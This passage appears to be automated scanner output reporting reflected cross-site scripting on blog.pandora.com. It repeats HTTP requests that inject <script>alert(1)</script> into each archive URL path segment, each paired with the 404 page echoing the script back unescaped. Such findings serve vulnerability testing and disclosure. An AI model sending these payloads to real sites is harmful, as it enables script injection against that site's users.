Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
